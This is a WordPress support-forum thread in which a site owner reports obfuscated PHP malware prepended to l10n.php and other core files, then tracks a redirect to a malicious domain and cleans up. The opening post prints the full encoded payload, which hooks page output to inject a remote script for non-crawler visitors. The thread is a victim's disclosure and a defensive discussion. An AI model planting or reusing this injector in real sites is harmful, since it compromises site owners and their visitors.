• I opened the l10n.php and found this encrypted code at the top of the file. It seemed malicious so i deleted this section immediately. Can someone help me decode this one?

    <?php /**/ $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$_8b7b1f56=$_8b7b("",$_8b7b1f("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21ybm8nXSkpeyAgICRHTE9CQUxTWydtcm5vJ109MTsgICBpZighZnVuY3Rpb25fZXhpc3RzKCdjcm9wZXJ4JykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2FkZHhpdCcpKXsgICAgIGZ1bmN0aW9uIGFkZHhpdCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5cGJuTnZiVzVwWVdKdmJHUnBibVp2YjNKbkxtTnZiUzlzYkM1d2FIQS9hejB4SWo0OEwzTmpjbWx3ZEQ0PSIpOyAgICAgIH0gICAgICByZXR1cm4gIiI7ICAgICB9ICAgIH0gICAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpeyAgICAgZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0Qyl7ICAgICAgJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD1Ab3JkKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywzLDEpKTsgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PTEwOyAgICAgICRSQTNENTJFNTJBNDg5MzZDREUwRjUzNTZCQjA4NjUyRjI9MDsgICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjQpeyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPUB1bnBhY2soJ3YnLHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDEwLDIpKTsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj0kUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCWzFdOyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yKyRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmOCl7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjE2KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTI7ICAgICAgfSAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9QGd6aW5mbGF0ZShAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkpOyAgICAgIGlmKCRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9PT1GQUxTRSl7ICAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9JFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QzsgICAgICB9ICAgICAgcmV0dXJuICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM7ICAgICB9ICAgIH0gICAgZnVuY3Rpb24gY3JvcGVyeCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsYWRkeGl0KCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuYWRkeGl0KCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ2Nyb3BlcngnKTsgICB9ICB9"));$_8b7b1f56();?>

Viewing 15 replies - 1 through 15 (of 39 total)
  • Thread Starter cipals15

    (@cipals15)

    Found similar code in the following files:

    wp-includes/

    1. kses.php
    2. general-template.php
    3. [more files] I’m currently check more affected files.

    Thread Starter cipals15

    (@cipals15)

    UPDATE:

    almost every .php file on wp-includes were prepended with this code. I think this should be of high-priority for the wordpress developers. It might be a security hole for WordPress 3.0.1

    Thread Starter cipals15

    (@cipals15)

    I have already sent a report to my hosting provider. However, do you know any decryptor software or something that might help in decoding that code?

    I think the code above translates to something which took advantage of the http.php and formatting.php.

    I will submit the code tomorrow to the research team at the anti-virus company where I am currently taking my internship. Maybe they could help.

    I did decrypt the code but will not post it for obvious reasons
    I certainly encourage you to do it on your own, however

    Thread Starter cipals15

    (@cipals15)

    UPDATE:

    The site redirects to insomniaboldinfocom.com. A very high alexa rank website. Warning! Don’t visit the site. Google search results showed that it might be malicious.

    Does anyone know here where i can report for a site take down?

    get the whois info and report it to their host

    Domain Name: INSOMNIABOLDINFOCOM.COM
       Registrar: BIZCN.COM, INC.
       Whois Server: whois.bizcn.com
       Referral URL: http://www.bizcn.com
       Name Server: NS1.HOPERJOPER.RU
       Name Server: NS2.HOPERJOPER.RU
       Status: clientDeleteProhibited
       Status: clientTransferProhibited
       Updated Date: 15-oct-2010
       Creation Date: 15-oct-2010
       Expiration Date: 15-oct-2011

    well that won’t work as bizcn.com is a malware site, also with russian dns
    likely won’t be able to do much about it

    Thread Starter cipals15

    (@cipals15)

    I don’t know how to decrypt such code. The only thing i can understand is that it is inside a <?php ?> tag and will run server side.

    Can you send me your decrypt results at [email protected]? Thanks.

    no – sorry I won’t send the code as it wouldn’t be ethical
    you could send it to your host to alert them and see if they will give it to you

    Thread Starter cipals15

    (@cipals15)

    The site was only created several weeks ago. Grr.. I hate those bloody hackers.

    And yeah, one of my tasks at my internship is to collect files from .ru and .bg sites which seemed to produce a large volume of excellent malware and virus applications.

    I have checked my .htaccess file and the code seems not malicious. Please confirm:

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    # END WordPress

    that is normal code

    Thread Starter cipals15

    (@cipals15)

    I think there’s is nothing more i can do. Thanks for the inputs.

    I’ve already done a backup of both wordpress files and the database.

    This attack cost me about $30 – $50 (that’s small.. i know). But it is still money that i’m losing.

    Currently, overwriting all wp-includes file with new files from a fresh install wordpress.

    I’ll update soon if found more malicious activities. I will be checking logs.

    Thread Starter cipals15

    (@cipals15)

    UPDATE:

    Can’t overwrite class-http.php after copying new files. Can someone explain to me briefly the function of this php file?

    UPDATE 2:

    a. Found out that my cache folder has a web-permission: Write.
    b. Found this malicious file .nfs00000000010fea6a000647f3 which only contains the code (as mentioned above).

    delete it completely and upload one from a fresh zip

    what the file does:

    Standardizes the HTTP requests for WordPress. Handles cookies, gzip encoding and decoding, chunk
     * decoding, if HTTP 1.1 and various other difficult HTTP protocol implementations.
     *
     * @link http://trac.ww.wp.xz.cn/ticket/4779 HTTP API Proposal

Viewing 15 replies - 1 through 15 (of 39 total)

The topic ‘Found some malicious code inside l10n.php’ is closed to new replies.